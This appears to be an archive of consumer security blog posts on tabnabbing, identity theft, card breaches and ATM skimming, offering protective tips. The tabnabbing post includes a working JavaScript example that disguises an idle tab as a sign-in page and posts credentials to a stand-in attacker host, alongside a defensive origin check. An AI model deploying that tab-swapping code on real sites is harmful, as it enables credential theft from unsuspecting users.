Archive for the ‘Data security’ Category

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months, a dangerous new threat has emerged in the world of internet phishing. Many of us have laughed at the crude and poorly crafted phishing attempts that land in our in-boxes.

Lest any of us fall asleep at the wheel thinking we are already hip to the rather primitive phishing tactics of the past, this one could easily catch you on its insidious hooks if you don’t read on.

Known as “tabnabbing” (often spelled “tabnapping”), this ploy is designed to psych you out with a behind-the-back switcheroo that hijacks a tab you already have open and catches even savvy observers by surprise. It needs nothing more than ordinary JavaScript embedded in a web page. Here’s how it works.

Brian Krebs explains:

“As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javascript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds, a tabbed page you have left unattended silently changes into a seemingly familiar page (complete with the cute little “favicon” on the tab) that asks you to re-enter your log-in credentials. As soon as you enter your private details, both you and your personal information have literally been “had”.

The best defense against this tricky new tactic is to take a time-out. What that means is that whenever a site you visit appears to have “timed out”, you should take some time out of your browsing frenzy to open a new tab and type the desired URL yourself.

None of the major browsers (Safari, Chrome, Firefox or Internet Explorer) reliably stops this trick, because a page is allowed to change its own title, favicon and contents, and countless legitimate sites do exactly that. A few add-ons try to detect the switch, and researchers have shown those checks can be sidestepped, which leaves most browsers vulnerable. The one thing the page’s script cannot rewrite is the URL in the address bar, which is why looking at it before you type a password works when nothing else does.

Safety dictates that you don’t log in on any tab that you have not opened yourself. Get into the habit of opening a fresh tab, and checking the address bar, whenever you enter a user name or password.
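The mechanism described above, as an added example that is not code from the original post or from Aza Raskin’s demonstration: the script notices the tab being hidden, waits five seconds, then swaps in a lookalike sign-in page together with a new title and favicon. The second half is what the address-bar advice amounts to in code: a password form is only worth filling in if the real origin is HTTPS and on a host you actually sign in to. The page titles, favicon URLs, form target and trusted-host list are made up for illustration; modern browsers report the tab being hidden through the visibilitychange event, while the original proof of concept relied on the window’s blur event.

```javascript
'use strict';
// Added example, not code from the original post. Titles, favicon URLs, the
// form target and the trusted-host list are constructed for illustration.

// What the tab looks like while the user is watching it.
const ORIGINAL = {
  title: 'Puppy Pictures',
  favicon: '/puppy.ico',
  html: '<h1>Puppies of the week</h1>',
};

// The lookalike the script swaps in after the user has looked away. The
// favicon is hot-linked from the impersonated site so the tab looks genuine.
const LOOKALIKE = {
  title: 'Sign in - Example Mail',
  favicon: 'https://mail.example.com/favicon.ico',
  html: '<h2>Your session has expired. Please sign in again.</h2>' +
        '<form action="https://collector.attacker.example/grab" method="post">' +
        '<input name="user" placeholder="Email"> ' +
        '<input name="pass" type="password" placeholder="Password"> ' +
        '<button>Sign in</button></form>',
};

const DWELL_MS = 5000; // how long the tab must stay hidden before the swap

// Attacker side: decide which face the page should show. hiddenAtMs is the
// time the tab was hidden, or null while it is visible. Pure, so it can be
// exercised outside a browser.
function nextState(current, hiddenAtMs, nowMs, dwellMs = DWELL_MS) {
  if (hiddenAtMs === null) return current;              // user is still looking
  return nowMs - hiddenAtMs >= dwellMs ? LOOKALIKE : current;
}

// Browser-only: rewrite title, favicon and body. Nothing here touches the
// address bar; that is the one thing the script cannot fake.
function applyState(state) {
  document.title = state.title;
  let icon = document.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = document.createElement('link');
    icon.rel = 'icon';
    document.head.appendChild(icon);
  }
  icon.href = state.favicon;
  document.body.innerHTML = state.html;
}

if (typeof document !== 'undefined') {
  let hiddenAt = null;
  document.addEventListener('visibilitychange', () => {
    hiddenAt = document.hidden ? Date.now() : null;     // abort if the user returns early
  });
  const timer = setInterval(() => {
    if (nextState(ORIGINAL, hiddenAt, Date.now()) === LOOKALIKE) {
      applyState(LOOKALIKE);
      clearInterval(timer);
    }
  }, 250);
}

// Defender side: the title and favicon prove nothing; the origin does.
// A host is trusted if it equals a listed host or is a subdomain of one, so
// "evil-example.com" and "mail.example.com.attacker.net" both fail.
function hostMatches(hostname, trustedHost) {
  const h = hostname.toLowerCase();
  const t = trustedHost.toLowerCase();
  return h === t || h.endsWith('.' + t);
}

function isTrustedLoginOrigin(origin, trustedHosts) {
  let url;
  try { url = new URL(origin); } catch (e) { return false; }
  if (url.protocol !== 'https:') return false;
  return trustedHosts.some((t) => hostMatches(url.hostname, t));
}

// Browser-only usage: refuse to submit a password form from an unexpected
// origin. In practice this check belongs in a bookmarklet or extension, not
// in the page it polices; it is placed here only to show the logic.
if (typeof window !== 'undefined') {
  const MY_LOGIN_HOSTS = ['mail.example.com', 'bank.example.net']; // constructed
  document.addEventListener('submit', (ev) => {
    const hasPassword = ev.target.querySelector('input[type="password"]');
    if (hasPassword && !isTrustedLoginOrigin(window.location.origin, MY_LOGIN_HOSTS)) {
      ev.preventDefault();
      alert('Password form on ' + window.location.origin +
            ' is not a site you sign in to. Open a fresh tab instead.');
    }
  }, true);
}
```

Load the block in a page, switch tabs for more than five seconds, and the tab comes back wearing the lookalike while the address bar still shows the original site; the origin check is deliberately a suffix match on the hostname rather than a substring match, since a substring match would wave through a domain that merely contains the trusted name.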

If you forget, and type your credentials into a previously opened, familiar-looking log-in page, one day soon you could literally open up a fresh can of worms.

ID Theft Is Lurking In Your Computer

Monday, June 7th, 2010

Personal computing guru Steve Bass recently shared some rather eye-opening statistics in his value-packed newsletter,  Techbite.

Security vendor PC Pitstop Research analyzed just over 50,000 computers for evidence of security threats, vulnerabilities, viruses and protection tools, and some interesting results emerged immediately.

Can you guess what percentage of computer users have absolutely no security software installed on their machines? A shocking 23% of us are flying through cyberspace as naked as jaybirds!

The PC Pitstop study was looking for evidence of the threats we should all be on the lookout for: spyware, malware/rogueware and keyloggers.

For clarity, the article defined its terms,  so there would be  no confusion about the nature or intent of each of these threats.

According to the report:

“We define spyware as the software that is unintentionally installed on the target computer. … A new growing segment of malware is rogue or phony security software.… Keyloggers are a category of software that is intended to monitor the activity of a target computer. This is a rather dangerous category since this form of malware can be used for identity theft, stalking and other ugly criminal activity.”

The good news is that Symantec, Trend Micro, Kaspersky and other leading providers are very effective, each in its own area of strength, at delivering protection from many of the most common threats:

  • Kaspersky was rated best against rogue software
  • Symantec was best in the fight against spyware
  • Trend Micro was best against keyloggers
  • Kaspersky was best against viruses

One of the takeaways here is that not all threats can be stopped with a single product. Layered protection is the best way to keep the multiplying strains of threats at bay, with one caveat: run one real-time antivirus engine rather than two at once (they fight over the same files and slow the machine down), and layer it with controls of a different kind, such as a firewall, browser protections and prompt patching.

The underlying theme from this study is that “no one security provider is good at protecting against all aspects of security. As the analysis suggests, each vendor has some strengths and weaknesses.”

The reality that a given threat could progress from mischievous to menacing to malicious is a real possibility in our data-rich daily lives.

Protect your data and assets accordingly.

Cyber Battlefield In Our Own Backyard

Thursday, May 6th, 2010

With the war in Iraq winding down and the war in Afghanistan heating up, many of us are unaware of the cyber-war raging on our own home turf.  If this is old news to you, stay with me.

According to a Congressional committee, attacks on the Department of Defense computer systems jumped 60 percent in 2009.

Russia, China and North Korea have all launched sustained attacks on U.S. government agencies including the Federal Trade Commission and the Department of the Treasury.

Analysts believe that security standards like those created by the National Institute of Standards and Technology (NIST) should be implemented immediately. According to the experts, following NIST’s standards could get us 90 percent of the way to where we need to be.

In Congressional testimony earlier this year, former National Intelligence Director Mike McConnell said that we could be on the brink of an all-out cyberwar. McConnell’s view has been repudiated by the current Secretary of Defense Robert Gates.

If Moore’s law holds (the computing power a dollar buys roughly doubles every two years), our enemies may be able to buy, beg, borrow or hack twice as much of our data as they can today for the same effort.

Computer scientist Daniel Geer Jr. aptly reveals what is at stake:

“We have spent centuries learning about securing the physical world, plus a few years learning about securing the digital world. What we know to be common to both is this: That which cannot be tolerated must be prevented.”

America’s most valued, electronically stored data is being targeted. Government agencies, private think tanks and university data warehouses are all vulnerable. The enemy operates from a distance with virtually no risk of personal danger.

What defense mechanisms can we construct to prevent our data from being stolen at the speed of light?

Top U.S. Banker Newest ID Theft Poster Child

Saturday, September 5th, 2009

On August 25th, President Barack Obama nominated Ben Bernanke to another term as chairman of the Federal Reserve.

In a story reported this week by The Economist:

“The decision was widely hailed on Wall Street and in Washington, DC. With few exceptions, politicians and economists lined up to praise Mr. Bernanke and to laud Mr. Obama for keeping him.”

Coincidentally, also on August 25th, Newsweek Magazine reported:

“Last summer, just as he was dealing with the first rumblings of the financial crisis on Wall Street, Bernanke learned that a thief had swiped his wife’s purse-including the couple’s joint check book. Later, someone started cashing checks on the Bernanke family account…”

“The theft of the Bernanke check book-never publicly revealed until now-soon became part of a wide-ranging (and previously underway) identity-theft investigation by the Secret Service and the U.S. Postal Inspection Service.”

The shocking news is that the “previously underway” investigation exposed what the Justice Department calls “the largest alleged credit and debit card data breach ever charged in the United States.”

Many of the highest profile breaches in U.S. history are allegedly the result of this one mastermind’s activity. Thankfully, the ringleader and two of his co-conspirators are behind bars now.

Victims of the crime-spree reportedly include:

  • Heartland Payment Systems
  • Supermarket chain Hannaford Brothers
  • 7-Eleven stores
  • DSW shoe stores
  • TJ Maxx stores

This is a wake up call for America. If brazen purse snatchers can swipe cash from our top banker’s checking account and hackers can swipe “protected” corporate data with impunity, then the average American continues to remain vulnerable beyond belief.

Protecting your mail, PINs, personal data, passwords, payment instruments (credit/debit cards, checks) and computer data is YOUR responsibility. Despite our best efforts, the portability of data outside our control leaves us all exposed in this digital world.

This truth-is-stranger-than-fiction story illustrates another truth. Without the dedicated and ongoing effort of law enforcement, your personal, medical or bank records are just as vulnerable as an attractive unattended purse, slung over the back of a chair at the local Starbucks.

Financial fear grips vast majority of Americans

Friday, April 10th, 2009

A new study conducted and released by Unisys Corporation reveals what most observers and pundits have been saying about our collective jittery nerves lately. With this new level of fear come concerns about fraud and ID theft reaching new heights  and threatening Americans more than ever.

According to the story published on Webwire: “The research, conducted with the latest Unisys Security Index, also confirms that most people are much more worried about their financial security, which saw a 12 percent spike when compared to results polled in September 2008. 

This concern now ranks as Americans’ number one security fear for the first time since Unisys began the global study in 2007. Conversely, the current data also shows the lowest level of concern about national security issues among U.S. consumers.”

The Webwire story goes on to report that more than two thirds of Americans are extremely worried or very concerned about other people obtaining and using their credit or debit card details, with 90 percent at least somewhat concerned.

The better news is that most of the identity theft strategies I’ve written about for some time now can still protect consumers, even in an age of unparalleled financial uncertainty.

By protecting your personal, private and proprietary information, you can still mitigate the effects of our current financial crimes tsunami. By guarding your credit and debit card numbers, bank and checking account numbers, Social Security number, PINs, passwords and computer files, you take away the matchsticks that could ignite a personal financial firestorm.

None of these methods (including credit monitoring services) is guaranteed to prevent your information from falling into the wrong hands. Careful monitoring of billing and banking statements, credit reports and other financial and medical records will keep you positioned to spot a potential problem. The businesses we frequent also have a responsibility to protect our data and our dollars.

The Unisys study goes on to report: “Banks and businesses need to understand that customers are more wary than ever about using services that may compromise their personal data. If economic concerns increase these fears, companies need new strategies to strengthen customer confidence through accountability and transparency, which also plays to part of the Obama administration’s call to action for government and business.”

The fear gripping our economy is understandable, but we can take proactive steps to minimize our exposure. As a last resort, we can all just repeat this prayer:

“Lord, defend me from my friends; I can account for my enemies.” — Charles DHericault

A Spyware Case Where Bigger Is Not Better

Sunday, February 1st, 2009

The Heartland Payment Systems security breach is now considered to possibly be the biggest in history.

The massive theft, thought to have occurred sometime in 2008, may have allowed the hackers to swipe credit card data from more than 100 million accounts. Apparently, it was spyware installed on the company’s internal network that grabbed the data.

PCWorld Magazine reported:

“Heartland says it didn’t discover the breach until Visa and MasterCard came knocking about suspicious activity involving card numbers processed by Heartland……

It’s all the more sad that we as consumers really can’t do a darn thing to protect ourselves against this kind of theft. We can be incredibly careful with our own PC and data, but we have no control over how it’s handled by the plethora of companies that store and process our information.”

According to the Washington Post, Heartland President and CFO Robert Baldwin contacted the U.S. Secret Service as well as two breach forensics teams to investigate.

In terms of sheer volume, Baldwin said:

“The transactional data crossing our platform, in terms of magnitude… is about 100 million transactions per month.”

This type of breach leaves you and me powerless to prevent it, and vulnerable as a result. The stolen Heartland data is precisely what crooks need to create counterfeit credit cards.

That is why the following basics of identity theft protection should be a part of YOUR financial planning:

  1. Carefully watch all your credit card statements for irregularities
  2. Be on the lookout for small charges from unknown merchants (crooks test a stolen number with a tiny charge first) and report them
  3. Consider freezing your credit files if you don’t plan to apply for new credit soon
  4. Using a credit card leaves you LESS vulnerable than using a debit card, which draws directly on your bank balance
  5. Request your free credit reports; staggering the three bureaus’ reports lets you take a free look three times a year

Baldwin was quoted as saying simply:

“….we recognize and feel badly about the inconvenience this is going to cause consumers.”

The giant credit card processor feels badly. I’ll sleep better now.

ID Theft Scam Makes Front Page Headlines in L.A.

Saturday, December 6th, 2008

The Los Angeles Daily News ran a front page headline yesterday that was right up my alley! The L.A.P.D. got their man in this case, and the bust was one of the most significant fraud arrests in recent Southern California memory.

Not only was the culprit apprehended after a lengthy investigation, but the tools of his trade were confiscated, making this arrest one of the more successful in terms of peeking into the secret world of a full time identity thief.

Like the illusionists in Las Vegas, these con-men guard their trade secrets closely, unless someone gets the chance to pull the curtain back and reveal the inner workings of their cleverness.

As reported in the Daily News yesterday:

“….underneath his cool and collected exterior, the 44-year-old man was found to possess more than 1000 forged credit cards he used to scam San Fernando Valley residents and businesses in an operation estimated to have netted millions of dollars, police said. His bail was set at $2 million and we’re investigating mail fraud, grand theft and additional charges…”

Investigators discovered state-of-the-art tools and equipment that enabled the suspect to encode magnetic stripes for the backs of the fake credit cards. Stores like Costco, Wal-Mart and Sam’s Club were perfect locations for the suspect to go on shopping sprees with the fake cards.

Fortunately, an alert internal investigations team at Costco noticed the suspect’s unusual purchasing patterns in one of their stores and the investigation was finally brought to a conclusion several months later.

Thanks in part to Hollywood, the theft or misappropriation of an identity for financial gain is all too common in television and movies, which desensitizes us to the devastating financial impact of this not-so-victimless crime in the “real world”.

Anyone who rents out property, or fills in a rental application, should note that this particular case involved private financial information taken from rental applications that were among the items confiscated. Costco has partnered with Identity Guard to offer credit monitoring services to its members for a nominal monthly fee.

A few reminders are in order:

  • Don’t lend your credit cards to anyone (seems obvious, I know)
  • Monitor your statements to detect unauthorized activity on your account
  • Report suspicious activity in writing to the card issuer
  • Make sure your mailbox is locked to protect statements or new cards that arrive
  • Minimize the number of credit cards that you carry
  • College dorms and apartments are rich targets for prying eyes and sticky fingers
  • Use online sites whose address starts with https://, which means the connection is encrypted; it does not by itself mean the site is honest, so check the domain name too

This case underscores the reality and vitality of professional identity theft gangs. Although credit isn’t as easy to obtain during this holiday season as it has been in the past, your chances of being victimized are better than ever.

Desperate times call for deliberate counter-measures!

If Obama and Palin Can Be Hacked, So Can You!

Monday, December 1st, 2008

With the holiday season upon us and the election season behind us, the average consumer may have their attention diverted away from personal privacy issues.

President-elect Barack Obama and Alaska Gov. Sarah Palin were concentrating on the election, while high tech thieves smelled an opportunity to violate the candidates’ privacy with reckless abandon. These fraudsters were phone company insiders and random email hackers, not mobsters from an Eastern European crime family.

Here is an excerpt from a story posted on fiercewireless.com:

“Verizon Wireless has fired the employees who accessed President-elect Barack Obama’s personal cell phone account without authorization.

A report on CNN.com quoted an unnamed Verizon source, who would not disclose how many people were fired but said, “we now consider this matter closed.” Apparently the employees were involved in customer service and were not authorized to look at an account unless a customer requested it.

The source also said that records of no other well-known customers had been breached. The phone that was accessed was a flip phone that had been inactive for months, and was not a Blackberry or other smartphone from which email could have been sent or data services could have been accessed.”

In Palin’s case, a 20-year-old student at the University of Tennessee has been indicted for breaking into one of Palin’s accounts and posting the information on a public website.

Here’s the point. We are all vulnerable to attack even if we are careful to do everything right in the privacy arena. Recovering from the emotional roller-coaster and sense of violation after being victimized can be both traumatic and lengthy. In extreme cases, you could even be facing a run-in with the law.

Prepare to remain steadfast this holiday season. If you are a member of AAA, you can unwrap an early Christmas present from them just by visiting their website and reading about their “free”, yes FREE credit monitoring and alerts for members only.

How A Financial Crisis Leaves Our Data Vulnerable

Wednesday, October 15th, 2008

As major banks, insurance companies and investment firms fall victim to the current tsunami of financial storms, your privacy may suffer. When firms change hands, downsize their payrolls and transfer massive amounts of data, proprietary information is left exposed and privacy erodes.

At the end of September, the Dow Jones Industrial Average took its biggest single-day point drop in history, falling 777 points. In the wake of the impending reorganization of American business, your credit card balances, your mortgage, your savings accounts and your credit history will probably be reshuffled and reinserted into the database of the account’s new overseer.

After days of marathon negotiations, the bailout measure initially went down to defeat in the House by a vote of 228 to 205. After the Senate and the House gave final approval to a modified version of the $700 billion rescue plan, President Bush signed it into law on October 3rd, 2008.

Although the free markets globally are facing their toughest challenge ever, those markets do work. The problem is that they are controlled by human beings who are subject to behavior that is sometimes irrational, emotional and irresponsible.

Because of the irresponsible and sometimes deliberate misdeeds of the guardians of the financial gate, it is still your responsibility to guard your personal information the best way you know how.

If you do not have a personal identity theft risk prevention, detection and mitigation plan in place, what are you waiting for? Visit the Privacy Rights Clearinghouse for great tips on how to protect yourself.

Identity Appreciation Month

Monday, September 1st, 2008

I appreciate the value of my intact identity profile…don’t you?

It has been too long since my last post. The past month has been a whirlwind for me as a result of my vacation to China.

As anyone who travels regularly will tell you, keeping tabs on your identity is both a necessary evil and a blessing beyond belief when traveling abroad. Venturing off to China during the Olympics is certainly a test of all the safeguards that are supposed to be in place to make sure that you are really the real you when you travel.

Passing through customs, immigration and the tightest security I have ever witnessed gave me both a sense of awe and gratitude. Chinese security officials had their hands full and the world witnessed one of the most spectacular displays of pomp, ceremony and athletic achievement ever organized.

At the same time, security was at an all time high for good reason. The eyes of the world were fixed on Beijing and our hosts wanted the occasion to shine. I think we all agree …..it did.

The 12 hour flight from the West Coast gave me a chance to catch up on some of the latest and greatest scams we are facing here at home. One that caught my eye in particular was the number of credit card skimming cases which the Secret Service is investigating around the country.

In my seminars, I magically produce and vanish a card “reader” which could be called a “skimming device” if it fell into the wrong hands. The problem is that we are so used to seeing them that we don’t even think before sliding our credit and debit cards into a device at an ATM, bank or retail location.

The challenge is that these high tech and deceptive skimmers don’t prevent the machine we are accessing from working and can be painted to match the color of any legitimate machine. According to USA Today, there are major investigations going on right now in California, Delaware, Nevada, Pennsylvania and Washington.

In Washington state alone, the number of recent victims could total as high as 250 people with losses totaling $500,000. The combined total of the cases totals between $1 million to $3.5 million stolen from victims.

The obvious first step for self-protection is awareness and a keen eye for anything that looks suspicious. Thieves quite often place a small camera on or near the pump or ATM to record PINs as you key them in, so shield the keypad with your free hand.

Diligent, constant awareness of irregularities and unauthorized activity on your accounts is your personal responsibility. The good news for American consumers is that reporting fraudulent or suspicious activity generally stops or reverses damage done with credit cards and most debit cards bearing the MasterCard or Visa logos. Irregularities must be reported in a “timely fashion”, which generally means within 60 days of the statement on which they appear; with a debit card, report sooner still, because under U.S. rules your share of the loss grows the longer you wait.

Yes, old fashioned skimming is alive and well and being dispensed at an ATM or gas pump near you.